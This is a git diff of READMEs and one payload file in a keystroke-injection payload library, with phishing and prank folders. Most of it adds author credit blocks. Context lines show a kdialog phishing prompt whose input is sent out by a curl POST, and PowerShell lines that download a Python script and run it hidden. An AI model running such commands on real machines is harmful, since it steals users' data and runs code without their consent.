\ No newline at end of file diff --git a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md b/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md index 3667e62..25014b6 100644 --- a/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md +++ b/payloads/library/phishing/StandardPhishingPayloadUsingKdialog_Linux/README.md @@ -56,4 +56,32 @@ $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog Generally it is recommended to divide the various steps at different times by dividing each command with some DELAY, in this case it is not recommended because phishing-type cyber attacks often tend to take a long time. How can you tell how long a user should take to enter their data? What if he doesn't remember his email? It is important to consider the slow factor, which, in theory, can take really long and in any case cannot be dynamically predicted. - Why is used the 'cyber-attack' word? -This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on. \ No newline at end of file +This payload is intended to be a working tool for performing cybersecurity analysis and is not intended to harm malicious users in any way. This term is used for simplicity in speaking but is really meant to be a study tool that can be worked on. + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/README.md b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/README.md index a0a7ef9..cde2aa3 100644 --- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/README.md +++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/README.md @@ -17,11 +17,35 @@ Opens a shell, download the image, define the local image path, run a command KD * Internet Connection * Linux KDE -### Executing program - -* Plug in your device - ### Settings - Image link - Local image path + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Change_The_App_That_Will_Be_Runned/README.md b/payloads/library/prank/Change_The_App_That_Will_Be_Runned/README.md index 95c3d6b..eef7ea0 100644 --- a/payloads/library/prank/Change_The_App_That_Will_Be_Runned/README.md +++ b/payloads/library/prank/Change_The_App_That_Will_Be_Runned/README.md @@ -72,4 +72,30 @@ Exec=Exec=/usr/lib/code-oss/code-oss --unity-launch %F # ... ``` -![GIF](Change_The_App_That_Will_Be_Runned.gif) \ No newline at end of file +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Continuos_Print_In_Terminal/README.md b/payloads/library/prank/Continuos_Print_In_Terminal/README.md index 8402eef..db6ab14 100644 --- a/payloads/library/prank/Continuos_Print_In_Terminal/README.md +++ b/payloads/library/prank/Continuos_Print_In_Terminal/README.md @@ -20,6 +20,30 @@ Open a PowerShell, download the Python script and execute it. The Python script * ExecutionPolicy Bypass * Python -### Executing program +## Credits -* Plug in your device +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Follow_Someone_On_Instagram/README.md b/payloads/library/prank/Follow_Someone_On_Instagram/README.md index 694cc70..6b0f191 100644 --- a/payloads/library/prank/Follow_Someone_On_Instagram/README.md +++ b/payloads/library/prank/Follow_Someone_On_Instagram/README.md @@ -29,4 +29,32 @@ Tested on: - It depends by the computer power and by the internet connection power - `[32] DELAY 2000` \ No newline at end of file + `[32] DELAY 2000` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Full-ScreenBannerJoke/README.md b/payloads/library/prank/Full-ScreenBannerJoke/README.md index a61cf47..d5e575e 100644 --- a/payloads/library/prank/Full-ScreenBannerJoke/README.md +++ b/payloads/library/prank/Full-ScreenBannerJoke/README.md @@ -18,10 +18,34 @@ Open a PowerShell, download the Python script and execute it. The Python script * Python installed * ExecutionPolicy Bypass -### Executing program - -* Plug in your device - ### Settings - Setup your Python script link in the payload.txt file + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt index 8628d1b..3e5f838 100644 --- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt +++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt @@ -26,4 +26,4 @@ STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py" STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden DELAY 1000 -ALT F4 +ALT F4 \ No newline at end of file diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md index 87f400e..b16d098 100644 --- a/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md +++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/README.md @@ -19,3 +19,31 @@ Opens a shell, dowloand the Python script that will prank your friends mouving t ### Settings - Setup your Python script link in the payload.txt file + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file diff --git a/payloads/library/prank/Try_To_Catch_Me/README.md b/payloads/library/prank/Try_To_Catch_Me/README.md index 38ba2df..10f3894 100644 --- a/payloads/library/prank/Try_To_Catch_Me/README.md +++ b/payloads/library/prank/Try_To_Catch_Me/README.md @@ -22,4 +22,32 @@ Open a PowerShell, download the Python script and execute it. The Python script - Setup your Python script link - `DEFINE SCRIPT-PY-LINK example.com` \ No newline at end of file + `DEFINE SCRIPT-PY-LINK example.com` + +## Credits + +

Aleff :octocat:

+
+ + + + + + +
+ + + +
Github + 		+ + + +
Instagram + 		+ + + +
Linkedin +
+
\ No newline at end of file